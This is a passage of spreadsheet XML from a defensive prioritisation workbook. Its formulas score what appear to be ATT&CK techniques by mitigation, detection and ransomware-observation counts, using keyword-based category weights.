      <c r="E253" s="25" t="s">
        <v>1078</v>
      </c>
      <c r="F253" s="51">
        <v>1</v>
      </c>
      <c r="G253" s="51">
        <v>1</v>
      </c>
      <c r="H253" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I253">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J253">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K253">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L253">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M253" s="25">
        <v>0</v>
      </c>
      <c r="N253" s="51">
        <v>0</v>
      </c>
      <c r="O253" s="51">
        <v>0</v>
      </c>
      <c r="P253" s="51">
        <v>0</v>
      </c>
      <c r="Q253" s="51">
        <v>0</v>
      </c>
      <c r="R253" s="52" t="s">
        <v>1048</v>
      </c>
      <c r="S253" s="51">
        <v>8</v>
      </c>
      <c r="T253" s="52" t="s">
        <v>1049</v>
      </c>
      <c r="U253" s="51">
        <v>11</v>
      </c>
      <c r="V253" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W253">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X253">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y253">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z253">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA253">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB253">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC253" s="29" t="s">
        <v>838</v>
      </c>
      <c r="AD253" s="25" t="str" cm="1">
        <f t="array" ref="AD253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE253" s="25">
        <f>IF(AD253="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF253" s="25" t="str" cm="1">
        <f t="array" ref="AF253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG253" s="25">
        <f>IF(AF253="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH253" s="25" t="str" cm="1">
        <f t="array" ref="AH253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC253)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI253" s="25">
        <f>IF(AH253="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ253" s="25" t="str" cm="1">
        <f t="array" ref="AJ253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK253" s="25">
        <f>IF(AJ253="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL253" s="25" t="str" cm="1">
        <f t="array" ref="AL253">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC253)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM253" s="25">
        <f>IF(AL253="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN253" s="60">
        <v>0</v>
      </c>
      <c r="AO253" s="51">
        <v>0</v>
      </c>
      <c r="AP253" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1803809523809526E-2</v>
      </c>
      <c r="AQ253" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10601269841269843</v>
      </c>
      <c r="AR253" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10601269841269843</v>
      </c>
      <c r="AS253" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT253" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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54" spans="1:47" ht="32.1">
      <c r="A254" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1803809523809526E-2</v>
      </c>
      <c r="B254" s="25">
        <f>SUM(H254,M254,V254)*(1+SUM(AE254,AG254,AI254,AK254,AM254))</f>
        <v>0.31803809523809529</v>
      </c>
      <c r="C254" s="25" t="s">
        <v>1079</v>
      </c>
      <c r="D254" s="25" t="s">
        <v>1046</v>
      </c>
      <c r="E254" s="25" t="s">
        <v>1080</v>
      </c>
      <c r="F254" s="51">
        <v>1</v>
      </c>
      <c r="G254" s="51">
        <v>1</v>
      </c>
      <c r="H254" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I254">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J254">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K254">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L254">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M254" s="25">
        <v>0</v>
      </c>
      <c r="N254" s="51">
        <v>0</v>
      </c>
      <c r="O254" s="51">
        <v>0</v>
      </c>
      <c r="P254" s="51">
        <v>0</v>
      </c>
      <c r="Q254" s="51">
        <v>0</v>
      </c>
      <c r="R254" s="52" t="s">
        <v>1048</v>
      </c>
      <c r="S254" s="51">
        <v>8</v>
      </c>
      <c r="T254" s="52" t="s">
        <v>1049</v>
      </c>
      <c r="U254" s="51">
        <v>11</v>
      </c>
      <c r="V254" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W254">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X254">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y254">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z254">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA254">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB254">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC254" s="29" t="s">
        <v>851</v>
      </c>
      <c r="AD254" s="25" t="str" cm="1">
        <f t="array" ref="AD254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC254)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE254" s="25">
        <f>IF(AD254="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF254" s="25" t="str" cm="1">
        <f t="array" ref="AF254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC254)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG254" s="25">
        <f>IF(AF254="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH254" s="25" t="str" cm="1">
        <f t="array" ref="AH254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC254)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI254" s="25">
        <f>IF(AH254="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ254" s="25" t="str" cm="1">
        <f t="array" ref="AJ254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC254)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK254" s="25">
        <f>IF(AJ254="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL254" s="25" t="str" cm="1">
        <f t="array" ref="AL254">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC254)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM254" s="25">
        <f>IF(AL254="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN254" s="52">
        <v>0</v>
      </c>
      <c r="AO254" s="51">
        <v>0</v>
      </c>
      <c r="AP254" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.1803809523809526E-2</v>
      </c>
      <c r="AQ254" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10601269841269843</v>
      </c>
      <c r="AR254" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10601269841269843</v>
      </c>
      <c r="AS254" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT254" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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55" spans="1:47">
      <c r="A255" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3658095238095237E-2</v>
      </c>
      <c r="B255" s="25">
        <f>SUM(H255,M255,V255)*(1+SUM(AE255,AG255,AI255,AK255,AM255))</f>
        <v>0.33658095238095237</v>
      </c>
      <c r="C255" s="25" t="s">
        <v>1081</v>
      </c>
      <c r="D255" s="25" t="s">
        <v>358</v>
      </c>
      <c r="E255" s="25" t="s">
        <v>1082</v>
      </c>
      <c r="F255" s="51">
        <v>1</v>
      </c>
      <c r="G255" s="51">
        <v>1</v>
      </c>
      <c r="H255" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I255">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J255">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K255">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L255">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M255" s="25">
        <v>0</v>
      </c>
      <c r="N255" s="51">
        <v>0</v>
      </c>
      <c r="O255" s="51">
        <v>0</v>
      </c>
      <c r="P255" s="51">
        <v>0</v>
      </c>
      <c r="Q255" s="51">
        <v>0</v>
      </c>
      <c r="R255" s="52" t="s">
        <v>1083</v>
      </c>
      <c r="S255" s="51">
        <v>8</v>
      </c>
      <c r="T255" s="51" t="s">
        <v>900</v>
      </c>
      <c r="U255" s="51">
        <v>11</v>
      </c>
      <c r="V255" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238098</v>
      </c>
      <c r="W255">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X255">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y255">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z255">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA255">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB255">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC255" s="29" t="s">
        <v>1021</v>
      </c>
      <c r="AD255" s="25" t="str" cm="1">
        <f t="array" ref="AD255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC255)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE255" s="25">
        <f>IF(AD255="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF255" s="25" t="str" cm="1">
        <f t="array" ref="AF255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG255" s="25">
        <f>IF(AF255="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH255" s="25" t="str" cm="1">
        <f t="array" ref="AH255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI255" s="25">
        <f>IF(AH255="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ255" s="25" t="str" cm="1">
        <f t="array" ref="AJ255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK255" s="25">
        <f>IF(AJ255="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL255" s="25" t="str" cm="1">
        <f t="array" ref="AL255">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC255)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM255" s="25">
        <f>IF(AL255="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN255" s="52">
        <v>0</v>
      </c>
      <c r="AO255" s="51">
        <v>0</v>
      </c>
      <c r="AP255" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.3658095238095237E-2</v>
      </c>
      <c r="AQ255" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11219365079365079</v>
      </c>
      <c r="AR255" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11219365079365079</v>
      </c>
      <c r="AS255" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT255" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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56" spans="1:47" ht="63.95">
      <c r="A256" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.7316666666666669E-2</v>
      </c>
      <c r="B256" s="25">
        <f>SUM(H256,M256,V256)*(1+SUM(AE256,AG256,AI256,AK256,AM256))</f>
        <v>0.57316666666666671</v>
      </c>
      <c r="C256" s="25" t="s">
        <v>1084</v>
      </c>
      <c r="D256" s="25" t="s">
        <v>1085</v>
      </c>
      <c r="E256" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F256" s="51">
        <v>3</v>
      </c>
      <c r="G256" s="51">
        <v>2</v>
      </c>
      <c r="H256" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I256">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J256">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K256">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L256">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M256" s="25">
        <v>0</v>
      </c>
      <c r="N256" s="51">
        <v>0</v>
      </c>
      <c r="O256" s="51">
        <v>0</v>
      </c>
      <c r="P256" s="51">
        <v>2</v>
      </c>
      <c r="Q256" s="51">
        <v>0</v>
      </c>
      <c r="R256" s="52" t="s">
        <v>1086</v>
      </c>
      <c r="S256" s="51">
        <v>8</v>
      </c>
      <c r="T256" s="52" t="s">
        <v>1087</v>
      </c>
      <c r="U256" s="51">
        <v>10</v>
      </c>
      <c r="V256" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238095</v>
      </c>
      <c r="W256">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X256">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y256">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z256">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA256">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB256">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC256" s="29" t="s">
        <v>1088</v>
      </c>
      <c r="AD256" s="25" t="str" cm="1">
        <f t="array" ref="AD256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC256)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE256" s="25">
        <f>IF(AD256="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF256" s="25" t="str" cm="1">
        <f t="array" ref="AF256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG256" s="25">
        <f>IF(AF256="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH256" s="25" t="str" cm="1">
        <f t="array" ref="AH256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC256)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI256" s="25">
        <f>IF(AH256="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ256" s="25" t="str" cm="1">
        <f t="array" ref="AJ256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK256" s="25">
        <f>IF(AJ256="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL256" s="25" t="str" cm="1">
        <f t="array" ref="AL256">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC256)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM256" s="25">
        <f>IF(AL256="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN256" s="52">
        <v>0</v>
      </c>
      <c r="AO256" s="51">
        <v>0</v>
      </c>
      <c r="AP256" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.7316666666666669E-2</v>
      </c>
      <c r="AQ256" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.19105555555555556</v>
      </c>
      <c r="AR256" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.19105555555555556</v>
      </c>
      <c r="AS256" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT256" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU25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57" spans="1:47">
      <c r="A257" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1003247619047619</v>
      </c>
      <c r="B257" s="25">
        <f>SUM(H257,M257,V257)*(1+SUM(AE257,AG257,AI257,AK257,AM257))</f>
        <v>0.33658095238095237</v>
      </c>
      <c r="C257" s="25" t="s">
        <v>1089</v>
      </c>
      <c r="D257" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E257" s="25" t="s">
        <v>1090</v>
      </c>
      <c r="F257" s="51">
        <v>1</v>
      </c>
      <c r="G257" s="51">
        <v>1</v>
      </c>
      <c r="H257" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I257">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J257">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K257">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L257">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M257" s="25">
        <v>0</v>
      </c>
      <c r="N257" s="51">
        <v>0</v>
      </c>
      <c r="O257" s="51">
        <v>7</v>
      </c>
      <c r="P257" s="51">
        <v>1</v>
      </c>
      <c r="Q257" s="51">
        <v>0</v>
      </c>
      <c r="R257" s="52" t="s">
        <v>1091</v>
      </c>
      <c r="S257" s="51">
        <v>6</v>
      </c>
      <c r="T257" s="52" t="s">
        <v>1092</v>
      </c>
      <c r="U257" s="51">
        <v>9</v>
      </c>
      <c r="V257" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238095</v>
      </c>
      <c r="W257">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X257">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y257">
